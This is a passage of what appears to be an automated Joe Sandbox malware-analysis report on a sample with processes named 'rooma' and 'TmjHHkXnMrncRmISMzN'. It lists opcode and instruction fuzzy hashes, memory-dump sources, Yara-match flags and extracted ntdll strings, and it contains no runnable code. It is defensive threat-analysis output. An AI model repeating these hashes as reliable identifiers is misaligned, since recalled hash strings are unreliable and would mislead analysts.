                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88face714ae4c074dc4a6fcd52360478ec455fe1099a00e5ccaf10a9f16c8294
                                                            • Instruction ID: eee8aa38b1b50d98ceb513abc3a2cfef536e50ae0a5fd733f3ddce4c300c70a8
                                                            • Opcode Fuzzy Hash: 88face714ae4c074dc4a6fcd52360478ec455fe1099a00e5ccaf10a9f16c8294
                                                            • Instruction Fuzzy Hash: 14900221642441525549B25844085074086B7E0251799C412A1414D50CC5669956D721
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ae1bd3410b23b27f8be13dd2b9c6e5738374594fcc5712a68d5de6975d1defc
                                                            • Instruction ID: f5214c6576ba2565a4aaf5d28f0990439c2372ff005309227b7f46ad4e5417aa
                                                            • Opcode Fuzzy Hash: 1ae1bd3410b23b27f8be13dd2b9c6e5738374594fcc5712a68d5de6975d1defc
                                                            • Instruction Fuzzy Hash: 2690023164140402D145725844086060089B7D0251F99C412A0424954EC6958B56AB61
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e1f6116b36abdc7e5174ed774286f3754712b9e23ab8a21fde27f0139c3864f
                                                            • Instruction ID: 16eec403e16018cbba7ea28841ca2de9f6e3bdaedf473b1d9bd9ee983e4fde28
                                                            • Opcode Fuzzy Hash: 5e1f6116b36abdc7e5174ed774286f3754712b9e23ab8a21fde27f0139c3864f
                                                            • Instruction Fuzzy Hash: DD90023160140842D10472584408B460085A7E0311F59C416A0124A54DC655C9517621
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 497449447f1b858d238dd84eb72a10fc251b053733db6a584f6cd36bda29311e
                                                            • Instruction ID: 8fe71cd8fe0a065c45b963084c401a1d10288fc83c630cc054f1fe2d6492462a
                                                            • Opcode Fuzzy Hash: 497449447f1b858d238dd84eb72a10fc251b053733db6a584f6cd36bda29311e
                                                            • Instruction Fuzzy Hash: D0900221A0540402D1447258541C7060095A7D0211F59D411A0024954DC6998B5567A1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a9a8cb150fc455e5f894f0adb2d9f49aef5e084490edd72fe3a5ee048bcf4f3
                                                            • Instruction ID: c1d1f14a7b2012ce0fd7be752339d52f52a6f0c9c9ab9bcc13f7fdf6bee4e8a2
                                                            • Opcode Fuzzy Hash: 4a9a8cb150fc455e5f894f0adb2d9f49aef5e084490edd72fe3a5ee048bcf4f3
                                                            • Instruction Fuzzy Hash: 5490023160140403D1047258550C7070085A7D0211F59D811A0424958DD69689516221
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e8ffc84f42d056cc0b72a36485f7f7474db2f0cc67b6840a6b1d846c93593133
                                                            • Instruction ID: d5cd74440a704be4fc878b21c4a42b1f9e17e6b4b4c46a424fd5871842444df1
                                                            • Opcode Fuzzy Hash: e8ffc84f42d056cc0b72a36485f7f7474db2f0cc67b6840a6b1d846c93593133
                                                            • Instruction Fuzzy Hash: 5B90023160140402D1047698540C6460085A7E0311F59D411A5024955EC6A589916231
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71f7658ccec156499fb6234dfb2de5d133a5373e8e04ce4a8a9b4f3da5dfcd37
                                                            • Instruction ID: 6eab1a12bc8ad2e2615b66330cbf82171f4f02066b81e53d96482d2f65fa4c62
                                                            • Opcode Fuzzy Hash: 71f7658ccec156499fb6234dfb2de5d133a5373e8e04ce4a8a9b4f3da5dfcd37
                                                            • Instruction Fuzzy Hash: 7590026161140042D1087258440870600C5A7E1211F59C412A2154954CC5698D615225
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce995eacf6b4c0c35c86dbe9ef2af3fc310df65fdb0a794a576175a0da7a4483
                                                            • Instruction ID: b78e8e8ff324cf9dbcd3a4a1f08fb0f1d0d3348591d300edfc8324cec4348ff6
                                                            • Opcode Fuzzy Hash: ce995eacf6b4c0c35c86dbe9ef2af3fc310df65fdb0a794a576175a0da7a4483
                                                            • Instruction Fuzzy Hash: F890026174140442D10472584418B060085E7E1311F59C415E1064954DC659CD526226
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3cfe15d7cc3a25e7f2fc1f43a5658a1dade396c9f90ee0ff295e8eae71cc6ad
                                                            • Instruction ID: 4629a896096f787e29b9ced9ea2940726aaaf89877a930b0fe5ca6ff5ea2a01a
                                                            • Opcode Fuzzy Hash: d3cfe15d7cc3a25e7f2fc1f43a5658a1dade396c9f90ee0ff295e8eae71cc6ad
                                                            • Instruction Fuzzy Hash: 90900221611C0042D20476684C18B070085A7D0313F59C515A0154954CC95589615621
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b73ca912fd9458ce907a74d88ad4a9419a731ab8c7b3da4ff8cdf23605081fa7
                                                            • Instruction ID: 1bb8e5f5c057e8876e665a347d8c6fe5b0954d6acb0d75dd157969071717b09e
                                                            • Opcode Fuzzy Hash: b73ca912fd9458ce907a74d88ad4a9419a731ab8c7b3da4ff8cdf23605081fa7
                                                            • Instruction Fuzzy Hash: AF90023160180402D1047258481870B0085A7D0312F59C411A1164955DC66589516671
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7482a9b6ce8aa6ef3cc75d775cfd718f085ec4dc1a86e959157fd82397053b58
                                                            • Instruction ID: 13126e730eed9474dac07f22c8ffddf060866756652a52456a96ea34fa4bbab9
                                                            • Opcode Fuzzy Hash: 7482a9b6ce8aa6ef3cc75d775cfd718f085ec4dc1a86e959157fd82397053b58
                                                            • Instruction Fuzzy Hash: F1900221A01400424144726888489064085BBE1221759C521A0998950DC59989655765
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f47f12c0a4de7f85139d83ecd6ae03e63291891d145018124d963b225689d5c3
                                                            • Instruction ID: abfaecb31d27ded898f2dc198357e2c0bf3110baefac1a4995bc3a0ff8df438e
                                                            • Opcode Fuzzy Hash: f47f12c0a4de7f85139d83ecd6ae03e63291891d145018124d963b225689d5c3
                                                            • Instruction Fuzzy Hash: 8590023160180402D1047258480C7470085A7D0312F59C411A5164955EC6A5C9916631
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7ce4f9cd2493b148f848ae5c2a859a4f4ea65995d3b299214f1401a1f193771
                                                            • Instruction ID: d0f760d3a659709de027d33b5a77410c8b655e8830763b12b83b3b23d4ce903a
                                                            • Opcode Fuzzy Hash: e7ce4f9cd2493b148f848ae5c2a859a4f4ea65995d3b299214f1401a1f193771
                                                            • Instruction Fuzzy Hash: 3E90022170140402D106725844186060089E7D1355F99C412E1424955DC6658A53A232
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92db9b83bbf18ea3f6eddb886597e2cf1c6a334dd21056741dd6a35575811274
                                                            • Instruction ID: d7adbcba0e9a8fbfc6a87e84133cd27eca80def3a3cc67819cface29b045b9aa
                                                            • Opcode Fuzzy Hash: 92db9b83bbf18ea3f6eddb886597e2cf1c6a334dd21056741dd6a35575811274
                                                            • Instruction Fuzzy Hash: 5390026160180403D144765848086070085A7D0312F59C411A2064955ECA698D516235
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ecea7384fd756249ad23f788594e76d777e8fadf130a5c4b885355a7d595d867
                                                            • Instruction ID: 29d057ab39bb92cdd35a86d8b03c94b77e9a148133dd738c260234c8b0108f65
                                                            • Opcode Fuzzy Hash: ecea7384fd756249ad23f788594e76d777e8fadf130a5c4b885355a7d595d867
                                                            • Instruction Fuzzy Hash: 90900221A0140502D10572584408616008AA7D0251F99C422A1024955ECA658A92A231
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc4f4907806136d721d7fa3c68661be19af7c30a1bb64dcb7f80f66371908708
                                                            • Instruction ID: 527b2bb90c8e7c394b00546424f191cf278eddbc0f293f41837fd272af30c0ec
                                                            • Opcode Fuzzy Hash: bc4f4907806136d721d7fa3c68661be19af7c30a1bb64dcb7f80f66371908708
                                                            • Instruction Fuzzy Hash: E890027160140402D144725844087460085A7D0311F59C411A5064954EC6998ED56765
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d17f0ef5a5a4f0535c1df4e12df53c71040500b75393e01bad5fa3aa09f00a87
                                                            • Instruction ID: 92e501718f3025db2990e66e866774c38398e7fc1403920938d656b58f397604
                                                            • Opcode Fuzzy Hash: d17f0ef5a5a4f0535c1df4e12df53c71040500b75393e01bad5fa3aa09f00a87
                                                            • Instruction Fuzzy Hash:
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: c8a7568f676a18a8ae77a3c6076824ac5f56f67c71ba10dbc3ede338dba9dce1
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                            • Instruction ID: df23dc21eeb217cef10665139a51cf27273a1e9efddfd195031fa44906b3d727
                                                            • Opcode Fuzzy Hash: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                            • Instruction Fuzzy Hash: EC51E8B1A04216BFCB25DB9CCC9097EFBF8BB48241B548169F495DB681D374DE4087E0
                                                            Strings
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01604787
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016046FC
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01604655
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01604742
                                                            • ExecuteOptions, xrefs: 016046A0
                                                            • Execute=1, xrefs: 01604713
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01604725
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                            • Instruction ID: 785c176b1b668f34f1b48950a1252c830c4a8a00b4b28a004afc10c9a6e35368
                                                            • Opcode Fuzzy Hash: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                            • Instruction Fuzzy Hash: 9651093160021A7EEF21AFE9EC86BAE77A8FF58700F04009DD605AF591DB709A458F54
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: f176d336896507b81ae247c519764fd48b9e536a4949eb655f99d2d663688700
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: 4381AD70E0524A9FEF35CE6CC8917BEBBA3BF46360F1A4659D861AF291C6349840CB51
                                                            Strings
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01607B7F
                                                            • RTL: Re-Waiting, xrefs: 01607BAC
                                                            • RTL: Resource at %p, xrefs: 01607B8E
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 269d3590e9dad9dd7094504a2923601b0865f35877f8fb2af09ea4b6117a0754
                                                            • Instruction ID: daba75950b8e8159b8e9784b2cc5b19c78c1d7965538d5fa5f53cc92bbbe1139
                                                            • Opcode Fuzzy Hash: 269d3590e9dad9dd7094504a2923601b0865f35877f8fb2af09ea4b6117a0754
                                                            • Instruction Fuzzy Hash: D941D0317007039FD725DE69CC41B6BB7E5FB98B10F000A1DE9AA9B780DB71E8058B91
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0160728C
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 016072C1
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01607294
                                                            • RTL: Resource at %p, xrefs: 016072A3
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: a036ee0f9178a331028e122098e7a53bb958175802096389ccf107d21cd83027
                                                            • Instruction ID: cc1bf0877383e9aedd7ed62e53955c8c1088ce8ed99bbb17fec1d48dc4fa8b73
                                                            • Opcode Fuzzy Hash: a036ee0f9178a331028e122098e7a53bb958175802096389ccf107d21cd83027
                                                            • Instruction Fuzzy Hash: 34411231604206AFC725CE69CC82F6AB7A6FF94B10F14461CF9959B280DB31F8128BD1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: bd109ff267c79021aff9273fbea2723ddd8661a325ea45c090fcd2d617567fbd
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: D791A171E002179EEB34DF6DC8816BEBBA1FF88328F54455AE965EF2C0E73099418751
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 1f7684f49a43a158d48254c8e437b3b19d1e317aa383caf2ecfeb6302d950003
                                                            • Instruction ID: ef814f6d351ff82fd828096481570fb976f1265b752c47719c6ffab4973dd735
                                                            • Opcode Fuzzy Hash: 1f7684f49a43a158d48254c8e437b3b19d1e317aa383caf2ecfeb6302d950003
                                                            • Instruction Fuzzy Hash: CE810CB1D0026A9BDB35CB54CC44BEEB7B4BF48714F0041DAAA19BB680D7309E84CFA1
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0161CFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4Qw@4Qw
                                                            • API String ID: 4062629308-2383119779
                                                            • Opcode ID: 9f693a3979ab28c2c105cc924226b20b1d006a7d622b37cf73de82a5013d4a04
                                                            • Instruction ID: 4423f35764625d56d91ee346183acc0ba05a3916503262eb8ab8f276d8550c53
                                                            • Opcode Fuzzy Hash: 9f693a3979ab28c2c105cc924226b20b1d006a7d622b37cf73de82a5013d4a04
                                                            • Instruction Fuzzy Hash: 9F418D71940216DFDB21AFA9CC40AAEBBB8FF95B40F04412AE915DF358E734C801CBA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$O$S$\$s
                                                            • API String ID: 0-3854637164
                                                            • Opcode ID: 646f73ed89b8168ae093a882147ea845decc3c5623a279a59feb47701b018a04
                                                            • Instruction ID: 848770acc36efdd4a28274606439d98a04be2c707c486b7d57f3483e83719381
                                                            • Opcode Fuzzy Hash: 646f73ed89b8168ae093a882147ea845decc3c5623a279a59feb47701b018a04
                                                            • Instruction Fuzzy Hash: D351E8B2D04119BBEB10EFA5DD44FFBB3B8EB44314F044199E9189B140E7B6BA548BE1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e98e3066f245e30ae57588310f92ca38ef7aab1b4f97c00621cee9f4ea2b23ea
                                                            • Instruction ID: ce9dd963035fa9b9a080388a4e11afb2fc8da636ffcb04344cec880e47f2dcb4
                                                            • Opcode Fuzzy Hash: e98e3066f245e30ae57588310f92ca38ef7aab1b4f97c00621cee9f4ea2b23ea
                                                            • Instruction Fuzzy Hash: FE72C0B0D05669CBEF24CF54C9987DDBBB1BB44308F1081C9C94A6B281D7B96AC9CF51
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a542aba5a1b4f6e1ba7b9867aadda924c0f00e6ac0f09298d84437553572971
                                                            • Instruction ID: daaca2a8a493a7746c458989d6c0716847544f58ae5da1ad6104a9005909f802
                                                            • Opcode Fuzzy Hash: 0a542aba5a1b4f6e1ba7b9867aadda924c0f00e6ac0f09298d84437553572971
                                                            • Instruction Fuzzy Hash: 81413DB1D11218AFDB54CF99DC81AEEBBB8EF49710F10415EFA18E7241D7B1A640CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65771d0ab22485249719c4f87bdcb85c318ee38e947b4955069759bdab1c0e7e
                                                            • Instruction ID: 6f6d06005adec238d6a930ea96dbfad74a455c0c9d8f64eae49766c0c57a1837
                                                            • Opcode Fuzzy Hash: 65771d0ab22485249719c4f87bdcb85c318ee38e947b4955069759bdab1c0e7e
                                                            • Instruction Fuzzy Hash: 092119B1A00649AFDB14DF98DD81EAFB7F9EF88704F108109F908A7244D774B915CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc49fb922f84998ca12884e03943383c183b368064824011c6b24dee3037dbf2
                                                            • Instruction ID: 215ee4cdefdfe0b5965b33300177b138151a44e16d9fbb15580c4b1f3964b599
                                                            • Opcode Fuzzy Hash: fc49fb922f84998ca12884e03943383c183b368064824011c6b24dee3037dbf2
                                                            • Instruction Fuzzy Hash: 001182B63803097BF720AA558C82FAB775DDB84B24F244015FB08AE2C1E6A5B81146B9
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a93c7a6cc81c67fdc74d5121c843b5308af103e0c0c72700d6b2428295937ad9
                                                            • Instruction ID: 5076c68fa743b9e0de322ec31c1e54a61cd0e742648c0334869b8b74dbf94d13
                                                            • Opcode Fuzzy Hash: a93c7a6cc81c67fdc74d5121c843b5308af103e0c0c72700d6b2428295937ad9
                                                            • Instruction Fuzzy Hash: E52180B1A00609AFD710DF98DC81EAFB7B8EF88710F108109FE1897244E770B811CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aad03d40d7b286a7ccbd9fcd57801cd46c167880f75d10a7742672eeea6352de
                                                            • Instruction ID: e9d21c53c427e15fc2923ac80311a01dac51fab76b252e6a78170cb8e98e3102
                                                            • Opcode Fuzzy Hash: aad03d40d7b286a7ccbd9fcd57801cd46c167880f75d10a7742672eeea6352de
                                                            • Instruction Fuzzy Hash: 44111CB2D0121CAF9B40DFA9D9409EFBBF8EF58610F04426AE915E7200E7709A148BE1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7327f516e50e532ebdfffddbb2e9d8dd8c43c2c21fac7d0622ed6c0ce123638
